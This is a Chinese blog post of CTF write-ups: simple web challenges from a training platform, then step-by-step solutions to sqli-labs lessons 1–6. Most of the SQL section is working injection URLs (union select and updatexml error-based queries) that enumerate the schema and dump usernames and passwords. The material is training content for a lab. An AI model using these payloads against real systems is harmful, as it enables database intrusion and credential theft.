《攻防世界》
第一道題 view-source
題目
解法:
一.點擊網址
二.使用 Ctrl+U查看源代碼
flag: cyberpeace{0fbc7858812876713975c740d40002e3}
第二道題 robots
在網站根目錄上加上f1ag_1s_h3re.php
得到flag
robots協議
robots協議也叫robots.txt(統一小寫)是一種存放于網站根目錄下的ASCII編碼的文本檔案,它通常告訴網路搜索引擎的漫游器(又稱網路蜘蛛),此網站中的哪些內容是不應被搜索引擎的漫游器獲取的,哪些是可以被漫游器獲取的,因為一些系統中的URL是大小寫敏感的,所以robots.txt的檔案名應統一為小寫,robots.txt應放置于網站的根目錄下,如果想單獨定義搜索引擎的漫游器訪問子目錄時的行為,那么可以將自定的設定合并到根目錄下的robots.txt,或者使用robots元資料(Metadata,又稱元資料)
第三道題 back up
在根目錄中輸入/index.php.bak
打開文本,找到flag
第四道題 cookie
點擊網址 按f12找到cookie,發現cookie.php
將cookie.php輸入根目錄中,找到flag
cookie是一些資料,儲存在電腦上的文本檔案中,cookie的作用就是用于解決如何讓記錄客戶端的用戶資訊
第五題 disabled_button
點擊網址 打開網頁 按F12
發現按鈕不能按是因為原始碼中有disabled 洗掉disabled
得到flag
disabled 屬性規定應該禁用 input 元素,被禁用的 input 元素既不可用,也不可點擊,
sql-labs
Less-1
判斷注入型別
URL地址中輸入http://sql-labs-15:8039/Less-1/?id=1 and1=2 頁面運行正常,SQL陳述句中沒有語法錯誤但有明顯邏輯錯誤,所以為字符型注入
注入單引號‘出現sql語法錯誤,為字符型注入
查詢欄位數
URL地址中輸入http://sql-labs-15:8039/Less-1/?id=1' order by 1--+
http://sql-labs-15:8039/Less-1/?id=1' order by 1,2--+
http://sql-labs-15:8039/Less-1/?id=1' order by 1,2,3--+
http://sql-labs-15:8039/Less-1/?id=1' order by 1,2,3,4--+此時報錯,說明欄位數為3
使用union聯合查詢http://sql-labs-15:8039/Less-1/?id=1' order by 1,2,3--+
開始注入
查詢資料庫
輸入http://sql-labs-15:8039/Less-1/?id=0' union select 1,2,database()--+
獲取當前資料庫名稱:security
查詢表名
輸入http://sql-labs-15:8039/Less-1/?id=54' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="security")--+得到當前資料庫下的所有表名
查詢列名
輸入http://sql-labs-15:8039/Less-1/?id=54' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security"and table_name="users")--+得到列名
查詢用戶名和密碼
輸入http://sql-labs-15:8039/Less-1/?id=54' union select 1,group_concat(username),group_concat(password) from users--+
Less-2
判斷輸入型別
注入單引號,頁面運行正常,為數字型注入
查詢欄位數
當在URL地址中輸入 http://sql-labs-15:8039/Less-2/?id=1 order by 4,頁面報錯,輸入http://sql-labs-15:8039/Less-2/?id=1 order by 3時,頁面正常運行,所以欄位數是3
開始注入
查詢資料庫
輸入http://sql-labs-15:8039/Less-2/?id=-1 union select 1,2,database(),得到庫名為security
查詢表名
輸入 http://sql-labs-15:8039/Less-2/?id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="security"),得到當前資料庫下的所有表名
查詢列名
輸入 http://sql-labs-15:8039/Less-2/?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security"and table_name="users"),得到當前表名下的所有列名
查詢用戶名和密碼
輸入http://sql-labs-15:8039/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users查詢到所有的賬戶名和密碼
Less-3
判斷注入型別
輸入 http://sql-labs-15:8039/Less-3/?id=1'頁面運行錯誤
shuru
輸入http://sql-labs-15:8039/Less-3/?id=1 ') or 1=1 --+頁面運行正常,為’)字符型注入
判斷欄位數
輸入http://sql-labs-15:8039/Less-3/?id=1 ') order by 3 --+,頁面顯示正常,輸入http://sql-labs-15:8039/Less-3/?id=1 ') order by 4 --+,頁面報錯,可判斷欄位數為3
開始查詢
確定欄位數后,使用union select聯合查詢
輸入 http://sql-labs-15:8039/Less-3/?id=-1 ') union select 1,2,3--+
查詢資料庫
輸入http://sql-labs-15:8039/Less-3/?id=-1 ') union select 1,2,database()--+,得到資料庫名security
查詢表名
輸入 http://sql-labs-15:8039/Less-3/?id=-1 ') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="security")--+得到當前資料庫下的所有表名
查詢列名
輸入 http://sql-labs-15:8039/Less-3/?id=-1 ') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security"and table_name="users")--+得到當前表的所有列名
查詢用戶名和密碼
輸入 http://sql-labs-15:8039/Less-3/?id=-1 ') union select 1,group_concat(username),group_concat(password) from users--+,得到所有的用戶名和密碼
Less-4
判斷字符型別
輸入http://sql-labs-15:8039/Less-4/?id=)頁面運行正常
輸入 http://sql-labs-15:8039/Less-4/?id=")頁面報錯,所以閉合方式為“)
結合原始碼
判斷欄位數
輸入http://sql-labs-15:8039/Less-4/?id=1") order by 3--+頁面運行正常
輸入http://sql-labs-15:8039/Less-4/?id=1") order by 4--+頁面報錯,我們可以知到欄位數為3
聯合查詢
輸入 http://sql-labs-15:8039/Less-4/?id=-1") union select 1,2,3--+
開始注入
查詢資料庫
輸入 http://sql-labs-15:8039/Less-4/?id=-1") union select 1,2,database()--+得到當前資料庫名為security
查詢表名
輸入 http://sql-labs-15:8039/Less-4/?id=-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="security")--+查詢到當前資料庫下的所有表名
查詢列名
輸入 http://sql-labs-15:8039/Less-4/?id=-1") union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security"and table_name="users")--+
查詢用戶名和密碼
輸入http://sql-labs-15:8039/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+ 得到所有的用戶名和密碼
Less-5
判斷欄位數
輸入http://sql-labs-15:8039/Less-5/?id=1 order by 3顯示出You are in......無顯示位,考慮使用SQL陳述句中的報錯函式updatexml()
查詢資料庫
輸入 http://sql-labs-15:8039/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+后,報錯顯示出了資料庫名security
查表名
輸入http://sql-labs-15:8039/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e),1)--+報錯出現所有表名
查列名
http://sql-labs-15:8039/Less-5/?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security"and table_name="users"),0x7e),1)--+
Less-6
與第五題一致,無顯示位,繼續使用updatexml()進行報錯查詢
查詢資料庫
查詢表名
查列名
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/350827.html
標籤:其他
上一篇:JBOSS未授權漏洞詳細復現